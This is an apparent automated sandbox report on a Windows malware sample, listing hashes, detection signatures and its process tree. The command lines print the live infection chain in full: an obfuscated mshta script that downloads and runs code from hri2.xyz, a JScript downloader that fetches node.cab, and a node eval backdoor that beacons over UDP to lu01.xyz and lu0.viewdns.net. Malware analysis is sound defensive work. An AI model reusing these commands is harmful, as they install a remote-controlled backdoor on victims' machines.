Analysis
-
max time kernel
146s -
max time network
148s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
09-06-2021 09:55
Static task
static1
Behavioral task
behavioral1
Sample
euthree_20210608-233519.exe
Resource
win7v20210410
windows7_x64
0 signatures
0 seconds
General
-
Target
euthree_20210608-233519.exe
-
Size
2KB
-
MD5
cd17d11bb2c8dd9942e816677df2dae2
-
SHA1
140fbc4ec7fd4be8c66dd38d6836473726fa7c1b
-
SHA256
5a2264e42206d968cbcfff583853a0e0d4250f078a5e59b77b8def16a6902e3f
-
SHA512
31180403ffbe4a2c2144bab8a93aed6d64c85a2c6658b44e8ee7cf8bc1a0e530de4141c0e685826f79457e396bb3d70a25c87ce30a142b481fc9bde0b93c6762
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 7 1020 mshta.exe 8 4004 cscript.exe -
Executes dropped EXE 1 IoCs
pid Process 1312 node.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 7 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 8 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 4044 wrote to memory of 1020 4044 euthree_20210608-233519.exe 73 PID 4044 wrote to memory of 1020 4044 euthree_20210608-233519.exe 73 PID 4044 wrote to memory of 1020 4044 euthree_20210608-233519.exe 73 PID 1020 wrote to memory of 4008 1020 mshta.exe 77 PID 1020 wrote to memory of 4008 1020 mshta.exe 77 PID 1020 wrote to memory of 4008 1020 mshta.exe 77 PID 4008 wrote to memory of 4004 4008 cmd.exe 79 PID 4008 wrote to memory of 4004 4008 cmd.exe 79 PID 4008 wrote to memory of 4004 4008 cmd.exe 79 PID 4008 wrote to memory of 2596 4008 cmd.exe 82 PID 4008 wrote to memory of 2596 4008 cmd.exe 82 PID 4008 wrote to memory of 2596 4008 cmd.exe 82 PID 4008 wrote to memory of 3564 4008 cmd.exe 83 PID 4008 wrote to memory of 3564 4008 cmd.exe 83 PID 4008 wrote to memory of 3564 4008 cmd.exe 83 PID 3564 wrote to memory of 1312 3564 cscript.exe 84 PID 3564 wrote to memory of 1312 3564 cscript.exe 84 PID 3564 wrote to memory of 1312 3564 cscript.exe 84
Processes
-
C:\Users\Admin\AppData\Local\Temp\euthree_20210608-233519.exe"C:\Users\Admin\AppData\Local\Temp\euthree_20210608-233519.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Windows\SysWOW64\mshta.exemshta "javascript:document.write();195;y=unescape('%339%7Eh%74t%70%3A%2F%2F%68r%692%2Ex%79z%2Fh%72i%2F%3F%32f%652%652%62%7E%326').split('~');150;try{x='WinHttp';35;x=new ActiveXObject(x+'.'+x+'Request.5.1');125;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);82;x.send();165;y='ipt.S';201;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);68;}catch(e){};129;;window.close();"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /d/s/c cd /d "C:\ProgramData" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);x.Open("GET",unescape(WScript.Arguments(0^)^),false^);x.Send(^);b=new ActiveXObject("ADODB.Stream"^);b.Type=1;b.Open(^);b.Write(x.ResponseBody^);b.SaveToFile(WScript.Arguments(1^),2^); > get1623232554288.txt & cscript /nologo /e:jscript get1623232554288.txt "http%3A%2F%2Fhri2.xyz%2Fhri%2F%3F2a42161be%26b%3D4d807304" node.cab & expand node.cab node.exe & del get1623232554288.txt node.cab ) & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1623232554288.txt & cscript /nologo /e:jscript get1623232554288.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27a42161be%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27lu01.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))" & del get1623232554288.txt3⤵
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Windows\SysWOW64\cscript.execscript /nologo /e:jscript get1623232554288.txt "http%3A%2F%2Fhri2.xyz%2Fhri%2F%3F2a42161be%26b%3D4d807304" node.cab4⤵
- Blocklisted process makes network request
PID:4004
-
-
C:\Windows\SysWOW64\expand.exeexpand node.cab node.exe4⤵
- Drops file in Windows directory
PID:2596
-
-
C:\Windows\SysWOW64\cscript.execscript /nologo /e:jscript get1623232554288.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27a42161be%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27lu01.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))"4⤵
- Suspicious use of WriteProcessMemory
PID:3564 -
C:\ProgramData\DNTException\node.exe"C:\ProgramData\DNTException\node.exe" -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27a42161be%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27lu01.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))5⤵
- Executes dropped EXE
PID:1312
-
-
-
-